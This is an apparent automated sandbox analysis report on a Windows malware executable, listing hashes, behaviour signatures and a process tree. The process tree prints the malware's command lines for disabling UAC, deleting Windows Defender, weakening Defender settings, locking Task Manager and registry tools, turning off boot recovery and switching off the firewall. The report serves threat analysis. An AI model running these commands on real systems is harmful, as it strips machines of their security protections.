Resubmissions

13-07-2024 09:54

240713-lxcvgawdmn 10

13-07-2024 09:52

240713-lv46yawdkj 10

13-07-2024 09:46

240713-lrz3tayajc 10

Analysis

  • max time kernel
    93s
  • max time network
    98s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    13-07-2024 09:46

General

  • Target

    f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35.exe

  • Size

    3.8MB

  • MD5

    15995b0b1fc5dd82f1c3ba1b7b40c5d4

  • SHA1

    3b6a4a5b8b1107854e35b01cd28b4cce7a003413

  • SHA256

    f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35

  • SHA512

    4ebe82a5d5d499eab10c9049647283976d95f102b24b2113bd59309ea107fb6cf8671640651e7d7cf13435e516c6d2dcbfe3a2fc8a8ed917398b3d86f6a77781

  • SSDEEP

    49152:aApBOr1sU6uEgjhlOCDw8mEFAuYg2OWpTMqBx+fdTmG2Y4MT9ffD+CzKcbmoivTN:

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 11 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35.exe
    "C:\Users\Admin\AppData\Local\Temp\f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2612
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\prorun.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4604
      • C:\Windows\system32\cacls.exe
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        3⤵
          PID:1284
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide icacls " \System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1672
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4288
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5028
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2448
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2700
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5088
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3828
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide sc stop windefend
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:628
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide sc delete windefend
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1704
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide bcdedit /set {default} recoveryenabled No
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2884
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide bcdedit /set {default} bootstatuspolicy ignoreallfailures
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4960
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command "Add - MpPreference - ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2052
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
          3⤵
          • UAC bypass
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5020
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - EnableControlledFolderAccess Disabled"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4892
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - PUAProtection disable"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3960
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - HighThreatDefaultAction 6 - Force"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3436
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - ModerateThreatDefaultAction 6"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3888
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - LowThreatDefaultAction 6"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3976
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - SevereThreatDefaultAction 6"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4272
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - ScanScheduleDay 8"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4928
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "netsh advfirewall set allprofiles state off"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4304
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
            4⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:1784

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      149d8ea75129b5bac13935c6f7ee2b40

      SHA1

      ec14c55a848e3dd28e474e8a67276589022ee5fa

      SHA256

      e4a07720c6d373c2e2e13ca98e4ccc169d6bf4fa15df35fef9a4d69185e023bd

      SHA512

      fb65b85dc3f4341dbf6640355c25238f31fade0547fc6214f7c83d70f6d98f05fa43a6fe7c1ec9e9454a463d482eb77efca0dbccc157baabd15bf89c865e27bc

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      e5bfec1063a497048fffb231a0621403

      SHA1

      97cf6a89f237f43b9c22e3e081f7d45924d435ba

      SHA256

      325d1ffa65e9593a834f3662168d0c1950de148c63f1e43b86727087f3881d6f

      SHA512

      e38c5189054cf09fb15de017d0bbe226338124ee02bb04530943c8fcfc303dbe5fe5fd28c9c1aea1b552d1a2b0b76cabbedd284a38a07d41ec9cf9e55b44dd0e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      58b97594c4d764d5d99a459fbee0fd33

      SHA1

      4d1f8f4f5bbf87a6ea3ae7b7be623542377365da

      SHA256

      8001b17515105615ae767a048f98b1c1d211130f7c8c7e9bb585cf063b0c6db2

      SHA512

      874c700052930cfc7bc99e3e0353bf3a3891e45854df7982f73a2fa4d8a60546d683fae0163104e047991955d7d6b8950447be83a93d99ae9d9931a1e13e3cf7

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      e89c193840c8fb53fc3de104b1c4b092

      SHA1

      8b41b6a392780e48cc33e673cf4412080c42981e

      SHA256

      920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c

      SHA512

      865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      5caad758326454b5788ec35315c4c304

      SHA1

      3aef8dba8042662a7fcf97e51047dc636b4d4724

      SHA256

      83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

      SHA512

      4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      38f0f14cc7ca72ad51216866e66efb4e

      SHA1

      34ed0f47a4aaa95e786ca9f125b0341b38bfb9be

      SHA256

      668820fc659c9d229d32731ead41381eca0e5fb57232bbd3ef0118f5a21fc501

      SHA512

      4a7d00c585784cf1aec6ed82d8c78542d2db3b9da30d8db20680a1ee9fd45b697207fbd459557336f2166d8b6ac17016f9e71c61ad351f2915bb163c8ed2b73a

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      ef5ef35c3059825861b16409862d0e3d

      SHA1

      cde5311765478b1bcf309219c1a86a0238612099

      SHA256

      53df4a6c07213c72fa9c8f1e6c20d5a771d587744f775b4d45b647c1f890cc4b

      SHA512

      3c5814f9f94f4127f175b79e9d95eb7426c67b2d593ef6880c62cc3541d36142b9cb7391e3eac58fe45991d4e5fa7f979c96cba91da2354b7f56d8a2bb76dd20

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      b9c2e6782fd47c983dc61478147f7176

      SHA1

      ebaf50c810dbeca3846867c685d77ae4c871f253

      SHA256

      010430a83f5f1bbd71687b20e9055bbdf643c4c4c5d2b9a5d18098a751750a0b

      SHA512

      bbca313407db73166df19c9a6e5c0ddd520f316dd7ddc0160b2a0cb31139e45aef6f2cff667a3025df56f2bb5e36a4b25dab39a16ff9f914857588d4e3e19834

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      5ed3bd9bc72e312aadc7571ad8786379

      SHA1

      c6cc90bf1250e7ec5cd7680a9689940cec6398da

      SHA256

      8c54d4148a9e2a3b524f471f99aa3d48778239ae494908b544ef8f014d7d0eee

      SHA512

      d020f76b71142f58c990f62354c568d9cee901a2e808d11d4e6d439aa3ffc36f070d613e3bd9522aaa1d44d3288c91c89fcf911600fdad9e96d3900c12941c47

    • C:\Users\Admin\AppData\Local\Temp\NSudo.exe

      Filesize

      247KB

      MD5

      5cae01aea8ed390ce9bec17b6c1237e4

      SHA1

      3a80a49efaac5d839400e4fb8f803243fb39a513

      SHA256

      19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

      SHA512

      c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rq2vo3nv.fj1.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\prorun.bat

      Filesize

      2KB

      MD5

      0f887625226181fb0136e6145919e56a

      SHA1

      1477b214aafcf9a518f7a13832da00d639f22943

      SHA256

      8706ff21236560835dff325f9ed3f32a96c3964806b04b49fff9b20e1df856d8

      SHA512

      81a68c2addd5bfd9a913f70352dafd643013f61ec42b3e9943caffc6f7e80a9521f70e69c13e9ab1c170cbdb4f1d2920384cacb3cbebab58d5dbb61574f44b7b

    • memory/2052-29-0x00000260F5730000-0x00000260F5752000-memory.dmp

      Filesize

      136KB

    • memory/2612-0-0x00007FFB17383000-0x00007FFB17385000-memory.dmp

      Filesize

      8KB

    • memory/2612-14-0x00007FFB17383000-0x00007FFB17385000-memory.dmp

      Filesize

      8KB

    • memory/2612-1-0x0000023B60B20000-0x0000023B60EF6000-memory.dmp

      Filesize

      3.8MB

    • memory/2612-141-0x0000023B62D30000-0x0000023B62D50000-memory.dmp

      Filesize

      128KB

    • memory/2612-142-0x0000023B7B5C0000-0x0000023B7B5CA000-memory.dmp

      Filesize

      40KB

    • memory/2612-143-0x0000023B7B8B0000-0x0000023B7BA1A000-memory.dmp

      Filesize

      1.4MB